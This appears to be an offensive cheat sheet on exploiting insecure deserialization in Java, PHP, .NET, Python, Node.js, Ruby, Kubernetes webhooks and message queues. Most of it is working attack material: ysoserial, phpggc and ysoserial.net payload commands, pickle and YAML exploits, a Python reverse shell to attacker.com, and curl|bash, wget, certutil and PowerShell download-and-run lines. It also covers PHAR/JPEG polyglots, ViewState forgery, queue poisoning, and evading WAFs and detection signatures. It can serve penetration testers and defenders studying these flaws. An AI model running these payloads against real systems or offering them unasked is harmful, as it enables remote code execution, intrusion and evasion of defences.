Deserialization vulnerabilities arise when an application reconstructs objects from serialized byte streams without validating the type, integrity, or origin of the data. Object reconstruction triggers constructors, finalizers, and language-specific magic methods, so an attacker who controls the serialized input often achieves remote code execution before any application-level validation runs.
| Format | Signature | Notes |
|---|---|---|
| Java ObjectInputStream | Hex ac ed 00 05, Base64 rO0AB |
Cookies, POST bodies, JMX/RMI streams |
| PHP serialize | O:<len>:"ClassName": or a:<count>:{ |
Frequently Base64-wrapped in cookies |
| .NET BinaryFormatter | Base64 AAEAAAD///// |
ViewState, remoting, session state |
| Python pickle | Opcodes \x80\x04\x95 (v4+), older (dp0 text |
Redis caches, Celery tasks, ML pipelines |
| Ruby Marshal | \x04\x08 leading bytes |
Session cookies in older Rails apps |
| YAML (any lang) | --- !ruby/object: or !!python/object/apply: |
Tag-based instantiation |
| Java XMLDecoder | <?xml with <java> or <object class= |
Legacy Java admin panels |
| .NET Json.NET | "$type": key in JSON |
TypeNameHandling != None |
| Java Jackson | ["class.name", { JSON array wrapper |
enableDefaultTyping / polymorphic handling |
ObjectInputStream.readObject() instantiates arbitrary classes present on the
classpath. Decades of library code provide usable gadget chains.
// Direct ObjectInputStream usage
ObjectInputStream ois = new ObjectInputStream(inputStream);
Object obj = ois.readObject();
// XMLDecoder -- equally dangerous, often overlooked
XMLDecoder decoder = new XMLDecoder(inputStream);
Object obj = decoder.readObject();
// XStream without allowlist
XStream xstream = new XStream();
Object obj = xstream.fromXML(userInput);
// Jackson polymorphic typing -- CVE-2017-7525 and successors
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
// Jackson @JsonTypeInfo on base class
@JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)
public abstract class BaseCommand { }
// JMX/RMI endpoints -- default port 1099, often unauthenticated
Every serializable Java class carries a serialVersionUID. A mismatch causes
InvalidClassException before any gadget logic executes. Extract the server's UID
from error messages or decompiled JARs, then rebuild the payload with ysoserial's
source. The UID often changes only on major releases, so brute-forcing common
versions is feasible when the exact version is unknown.
Match the chain to libraries present on the target classpath.
# CommonsCollections -- most widely applicable
# CC1: commons-collections 3.1, JDK < 8u72
java -jar ysoserial.jar CommonsCollections1 'curl http://attacker.com/cb' > payload.bin
# CC5: later JDK versions where CC1 is patched
java -jar ysoserial.jar CommonsCollections5 'curl http://attacker.com/cb' > payload.bin
# CC7: Hashtable entry point, bypasses some ObjectInputFilter rules
java -jar ysoserial.jar CommonsCollections7 'id > /tmp/proof.txt' > payload.bin
# Spring chain -- requires spring-core + spring-beans
java -jar ysoserial.jar Spring1 'wget http://attacker.com/s.sh -O /tmp/s.sh' > payload.bin
# Hibernate chain -- requires hibernate-core
java -jar ysoserial.jar Hibernate1 'bash -c {echo,BASE64}|{base64,-d}|bash' > payload.bin
# CommonsBeanutils -- present in many apps via shaded dependencies
java -jar ysoserial.jar CommonsBeanutils1 'ping -c 3 attacker.com' > payload.bin
# URLDNS -- DNS lookup only, no RCE, safe for detection confirmation
java -jar ysoserial.jar URLDNS 'http://deser-confirm.attacker.com' > payload.bin
# JRMPClient -- redirect deser to attacker-controlled JRMP listener
java -jar ysoserial.jar JRMPClient 'attacker.com:1099' > payload.bin
# On attacker host, serve secondary payload via JRMP listener
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 'id'
JMX and RMI registries accept serialized objects over the wire and are frequently exposed without authentication on internal networks.
# Scan for RMI registries
nmap -sV -p 1099,1098,9010,9011 --script rmi-dumpregistry TARGET
# marshalsec: exploit RMI/JNDI
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer \
"http://attacker.com:8080/#ExploitClass" 1099
When enableDefaultTyping() or @JsonTypeInfo(use = Id.CLASS) is active, you
supply a JSON array naming the class to instantiate.
["com.sun.rowset.JdbcRowSetImpl",
{"dataSourceName":"ldap://attacker.com:1389/Exploit","autoCommit":true}]
Jackson maintainers continuously add classes to a denylist. Check the target's
version against known bypass classes: org.apache.ibatis.datasource.jndi.JndiDataSourceFactory,
com.caucho.config.types.ResourceRef, and similar JNDI-capable beans.
unserialize() instantiates objects and invokes magic methods (__wakeup,
__destruct, __toString) during reconstruction. The phar:// stream wrapper
triggers deserialization without an explicit unserialize() call.
// Direct unserialize
$obj = unserialize($userInput);
// phar:// wrapper -- any file operation on a phar:// path is a sink
file_exists("phar://uploads/avatar.jpg");
is_dir("phar://" . $userControlledPath);
// Triggering functions: file_exists, is_dir, is_file, file_get_contents,
// fopen, fileatime, filectime, filemtime, filesize, copy, rename, unlink,
// stat, lstat, getimagesize, exif_read_data, hash_file, md5_file, sha1_file
phpggc -l # List all available chains
# Laravel RCE -- PendingBroadcast + Dispatcher, works 5.5 through 9.x
phpggc Laravel/RCE1 system 'id' -b # -b = base64
phpggc Laravel/RCE10 system 'cat /etc/passwd' -s # -s = serialized
# Symfony RCE -- targets process component
phpggc Symfony/RCE4 exec 'curl http://attacker.com/s.sh|bash' -b
# Monolog RCE -- present in most Composer projects
phpggc Monolog/RCE1 system 'whoami' -b
# Guzzle / WordPress chains
phpggc Guzzle/RCE1 system 'id' -b
phpggc WordPress/RCE1 system 'id' -b
# PHAR output instead of raw serialized data
phpggc Laravel/RCE1 system 'id' -p phar -o exploit.phar
# PHAR polyglot disguised as JPEG
phpggc Laravel/RCE1 system 'id' -p phar -pp header.jpg -o exploit.jpg
The phar:// wrapper deserializes the metadata section of a PHAR archive on any file
operation. The sink is a file function, not unserialize(), so it evades many audits.
// Build a malicious PHAR (php.ini: phar.readonly = 0)
$phar = new Phar('exploit.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'test');
$object = new VulnerableClass();
$object->command = 'id';
$phar->setMetadata($object);
$phar->stopBuffering();
// Create a polyglot by prepending a JPEG header
$jpegHeader = file_get_contents('legitimate.jpg');
file_put_contents('exploit.jpg', $jpegHeader . file_get_contents('exploit.phar'));
Upload the polyglot as an image, then trigger a file operation referencing
phar://uploads/exploit.jpg/test.txt.
BinaryFormatter is the most dangerous .NET serializer. Microsoft has formally
deprecated it, but legacy applications and internal tools still use it.
// BinaryFormatter -- deprecated, always dangerous
BinaryFormatter formatter = new BinaryFormatter();
object obj = formatter.Deserialize(stream);
// SoapFormatter / NetDataContractSerializer -- equally dangerous, less common
// LosFormatter -- used in ViewState
LosFormatter los = new LosFormatter();
object obj = los.Deserialize(viewStateString);
// Json.NET with TypeNameHandling != None
JsonConvert.DeserializeObject<object>(json, new JsonSerializerSettings {
TypeNameHandling = TypeNameHandling.All // or Objects, Arrays, Auto
});
# TypeConfuseDelegate -- broad .NET coverage
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "ping attacker.com"
# WindowsIdentity -- when TypeConfuseDelegate is blocked
ysoserial.exe -g WindowsIdentity -f BinaryFormatter -c "certutil -urlcache -split -f http://attacker.com/s.exe C:\Temp\s.exe"
# TextFormattingRunProperties -- targets WPF/XAML
ysoserial.exe -g TextFormattingRunProperties -f BinaryFormatter -c "calc.exe"
# PSObject -- PowerShell-specific
ysoserial.exe -g PSObject -f BinaryFormatter -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/ps.ps1')"
# Json.NET TypeNameHandling
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "cmd /c whoami > C:\proof.txt"
# Base64 output for ViewState or cookie injection
ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "ping attacker.com" -o base64
ASP.NET ViewState is a serialized hidden form field. When MAC validation is disabled or the machine key is known, you inject a gadget chain directly.
# If machine key is known (web.config disclosure, default keys):
ysoserial.exe -p ViewState \
-g TextFormattingRunProperties \
-c "powershell -enc BASE64CMD" \
--validationalg="SHA1" \
--validationkey="KNOWN_KEY" \
--generator="GENERATOR_VALUE" \
--path="/target/page.aspx" \
--islegacy
When TypeNameHandling is not None, the $type property controls instantiation.
{
"$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",
"MethodName": "Start",
"MethodParameters": {
"$type": "System.Collections.ArrayList, mscorlib",
"$values": ["cmd.exe", "/c whoami"]
},
"ObjectInstance": {"$type": "System.Diagnostics.Process, System"}
}
Python's pickle executes arbitrary code during deserialization through the
__reduce__ method. There is no safe way to deserialize untrusted pickle data.
import pickle, os, base64
class Exploit:
def __reduce__(self):
return (os.system, ('curl http://attacker.com/callback',))
payload = pickle.dumps(Exploit())
print(base64.b64encode(payload).decode())
# Reverse shell variant
class ReverseShell:
def __reduce__(self):
return (os.system, (
'python3 -c \'import socket,subprocess,os;'
's=socket.socket();s.connect(("attacker.com",4444));'
'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'',))
# Chained multi-step payload
class ChainedExploit:
def __reduce__(self):
return (eval, ("__import__('os').system('wget http://attacker.com/i -O /tmp/i && chmod +x /tmp/i && /tmp/i')",))
yaml.load() without a safe loader permits arbitrary object instantiation.
# Direct command execution
!!python/object/apply:os.system
- "curl http://attacker.com/callback"
# Subprocess with output
!!python/object/apply:subprocess.check_output
- ["id"]
# Find unsafe yaml.load in codebase
grep -rn "yaml\.load\s*(" --include="*.py" /path/to/codebase
import shelve # Uses pickle internally -- RCE on shelve.open() of attacker-controlled .db
import marshal # Code object injection via marshal.loads()
import jsonpickle # Third-party, same risks as pickle via jsonpickle.decode()
The node-serialize library uses _$$ND_FUNC$$_ to mark serialized functions.
Appending () creates an IIFE that executes during deserialization.
// Trailing () causes immediate execution
{"role":"_$$ND_FUNC$$_function(){require('child_process').execSync('curl http://attacker.com/cb')}()"}
// Base64-wrapped to avoid character issues
{"p":"_$$ND_FUNC$$_function(){eval(Buffer.from('BASE64PAYLOAD','base64').toString())}()"}
// funcster deserializes via new Function() constructor
{"__js_function": "function(){return require('child_process').execSync('id').toString()}"}
Look for _$$ND_FUNC$$_ and __js_function in cookies, session tokens, and request
bodies.
Marshal.load and YAML.load both instantiate arbitrary objects and are common
sinks in Rails applications.
# Gem::Requirement chain (Ruby 2.x) / Gem::Installer (varies by version)
# ERB template execution chain
require 'erb'
class Exploit
def initialize
@template = "<%= `id` %>"
end
end
payload = Marshal.dump(exploit_chain)
encoded = Base64.strict_encode64(payload)
--- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: "curl http://attacker.com/callback"
method_id: :resolve
Rails session cookies before 5.2 used signed but not encrypted Marshal data. With
the secret_key_base, you forge session cookies containing gadget chains.
Admission controllers deserialize AdmissionReview JSON. A webhook that passes
annotation or label values from the admission request to an unsafe deserializer
creates a cluster-level RCE vector.
apiVersion: v1
kind: Pod
metadata:
name: test-pod
annotations:
config-data: "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH..."
spec:
containers:
- name: test
image: nginx
The payload executes in the webhook's context, which typically has elevated cluster permissions.
Applications consuming from Kafka, RabbitMQ, SQS, or Redis often blindly deserialize message payloads. Producer access lets you poison every consumer.
import redis, pickle, os
class Exploit:
def __reduce__(self):
return (os.system, ('curl http://attacker.com/callback',))
r = redis.Redis(host='target-redis', port=6379)
r.lpush('celery', pickle.dumps({
'body': pickle.dumps(Exploit()),
'content-type': 'application/x-python-serialize',
}))
Serverless functions deserializing event payloads from S3, SNS, or SQS are vulnerable when the event source is attacker-controllable (e.g., public upload).
def handler(event, context):
obj = s3.get_object(Bucket=event['Records'][0]['s3']['bucket']['name'],
Key=event['Records'][0]['s3']['object']['key'])
data = pickle.loads(obj['Body'].read()) # RCE if attacker uploads to bucket
# Double Base64 -- changes byte pattern
cat payload.bin | base64 | base64 > double_encoded.txt
# Gzip before Base64 -- entirely different pattern
gzip -c payload.bin | base64 > compressed_payload.txt
# URL encoding
cat payload.bin | python3 -c "import sys,urllib.parse; print(urllib.parse.quote(sys.stdin.buffer.read()))"
# Unicode escaping for JSON payloads -- replace ASCII in $type with \uXXXX
# Parameter splitting -- some apps concatenate params before deserializing
Switch the delivery format to bypass format-specific WAF rules:
POST /api/endpoint HTTP/1.1
Content-Type: application/x-java-serialized-object
[binary payload]
<?xml version="1.0"?>
<java class="java.beans.XMLDecoder">
<object class="java.lang.Runtime" method="getRuntime">
<void method="exec">
<string>curl http://attacker.com/callback</string>
</void>
</object>
</java>
Many applications apply multiple encoding layers. Wrap your payload to match:
When you lack the key, look for default keys in framework documentation, key disclosure via path traversal or SSRF, or padding oracle attacks to encrypt without the key.
Understanding defensive detection helps you craft payloads that avoid alerts.
Network signatures defenders match:
ac ed 00 05 / Base64 rO0AB in HTTP trafficAAEAAAD///// in form fields or cookiesO:\d+:" in request parameters$type keys in JSON bodies (Json.NET)_$$ND_FUNC$$_ in Node.js cookies!!python/object tags in YAML inputsRuntime defenses you will encounter:
ObjectInputFilter (JEP 290) -- class allowlists/denylists. Bypass with
chains operating entirely within the allowed set.SerializationBinder -- restricts type resolution. Bypass with types within
the allowed namespace that still enable execution.allowed_classes in unserialize() -- limits instantiation. Bypass by using
only allowed classes, or reaching the sink through phar:// where the parameter is
not applied.Log artifacts your attack generates:
ClassNotFoundException / ClassCastException in server logs (failed chain)ObjectInputStream, readObject, readResolve
| Scenario | Tool | Payload | Verification |
|---|---|---|---|
| Java, Commons Collections 3.x | ysoserial | CommonsCollections1-7 |
URLDNS first |
| Java, unknown classpath | ysoserial | URLDNS then error-based enumeration |
DNS callback |
| PHP Laravel 5.x-9.x | phpggc | Laravel/RCE1-RCE10 |
DNS or sleep |
| PHP file upload + file op | phpggc | -p phar -pp header.jpg polyglot |
phar:// trigger |
| .NET BinaryFormatter | ysoserial.net | TypeConfuseDelegate |
Process or DNS |
| .NET ViewState, known key | ysoserial.net | -p ViewState with key params |
Blind exec |
| .NET Json.NET TypeNameHandling | ysoserial.net | ObjectDataProvider -f Json.Net |
File write or OOB |
| Python pickle in web app | Manual | __reduce__ + os.system |
Curl callback |
| Python Celery/Redis | Manual | Pickle into task queue | All consumers exec |
| Python yaml.load | Manual | !!python/object/apply:os.system |
OOB callback |
| Node.js node-serialize | Manual | _$$ND_FUNC$$_function(){...}() |
Reverse shell |
| Ruby Marshal in Rails cookie | Manual | Gem::Requirement + secret_key_base | Session forge + RCE |
| K8s admission webhook | ysoserial/manual | Payload in pod annotation | Webhook callback |
Safe confirmation sequence (always start here):
Tools:
Critical CVEs: CVE-2015-4852 (WebLogic T3), CVE-2017-7525 (Jackson defaultTyping), CVE-2017-9805 (Struts 2 XStream), CVE-2018-1000861 (Jenkins Stapler), CVE-2019-2725 (WebLogic XMLDecoder), CVE-2019-6340 (Drupal REST), CVE-2019-18935 (Telerik UI .NET), CVE-2020-9484 (Tomcat session persistence), CVE-2020-36188 (Jackson SSRF via JNDI), CVE-2021-21978 (VMware View Planner), CVE-2023-34362 (MOVEit Transfer), CVE-2023-46604 (ActiveMQ RCE)
Research: "Marshalling Pickles" (Frohoff/Lawrence, AppSecCali 2015), "Friday the 13th: JSON Attacks" (Munoz/Mirosh, BlackHat 2017), "Are You My Type?" (Munoz/Mirosh, .NET serializers), OWASP Deserialization Cheat Sheet, PortSwigger Insecure Deserialization.